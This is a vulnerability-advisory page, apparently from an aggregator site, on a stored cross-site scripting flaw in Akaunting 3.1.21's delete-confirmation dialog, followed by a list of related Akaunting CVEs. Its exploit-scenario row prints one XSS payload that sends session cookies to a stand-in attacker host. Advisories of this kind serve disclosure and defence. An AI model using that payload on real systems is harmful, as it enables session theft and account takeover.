Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-delivered stored XSS with scope change; PR:H reflects required record-modification permissions; UI:R for victim interaction; no availability impact.
Primary rating from Vendor (Fluid Attacks).
CVSS VectorVendor: Fluid Attacks
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
Akaunting 3.1.21 contains an authenticated stored cross-site scripting vulnerability in the reusable delete confirmation flow. A user with permission to create or modify records, such as Items, can store HTML/JavaScript in the record name.
AnalysisAI
Stored cross-site scripting in Akaunting 3.1.21 allows an authenticated user with record creation or modification privileges to embed malicious HTML/JavaScript into record name fields (such as Items), which subsequently executes in any other user's browser session when the reusable delete confirmation dialog renders that name unsanitized. The vulnerability is confirmed by Fluid Attacks security research and affects the shared delete confirmation component across multiple record types. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The attacker must be authenticated to Akaunting 3.1.21 and hold sufficient role-based permissions to create or modify records in modules that use the shared delete confirmation flow - explicitly, the Items module is confirmed in the description, and other record types using the same reusable component may also be affected. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 4.8 (Medium) accurately reflects the constrained real-world risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with Item creation privileges in Akaunting logs in and creates a new Item record with a name containing a JavaScript payload such as '<img src=x onerror=document.location="https://attacker.example/steal?c="+document.cookie>'. When an administrator or another authenticated user navigates to delete that Item and the reusable delete confirmation modal renders the record name, the embedded script executes silently in the victim's browser, potentially exfiltrating session cookies or performing authenticated actions on their behalf. … |
| Remediation | No specific vendor-released patched version was identified in the available data - the upstream fix version is not independently confirmed. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
An OS command injection vulnerability exists in Akaunting v3.1.3 and earlier. Rated critical severity (CVSS 9.8), this v
Akaunting version 2.1.12 and earlier suffers from a code injection issue in the Money.php component of the application.
Akaunting version 2.1.12 and earlier suffers from a password reset spoofing vulnerability, wherein an attacker can proxy
Akaunting version 2.1.12 and earlier suffers from an authentication bypass issue in the user-controllable field, compani
Akaunting version 2.1.12 and earlier suffers from a denial-of-service issue that is triggered by setting a malformed 'lo
Akaunting version 2.1.12 and earlier suffers from a persistent (type II) cross-site scripting (XSS) vulnerability in pro
Akaunting version 2.1.12 and earlier suffers from a persistent (type II) cross-site scripting (XSS) vulnerability in the
Cross-site scripting (XSS) in Akaunting up to version 3.1.21 allows authenticated users to inject malicious scripts via
Stored Cross-Site Scripting in Akaunting 3.1.21 allows a high-privileged authenticated user with report creation or upda
Stored cross-site scripting in Akaunting 3.1.21 allows an authenticated high-privileged user to inject arbitrary HTML an
Cross-site scripting (XSS) vulnerability in the component /common/reports of Akaunting v3.1.18 allows attackers to execu
An issue in the component /settings/localisation of Akaunting v3.1.18 allows authenticated attackers to cause a Denial o
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38260
GHSA-rqfr-jhc5-r4q9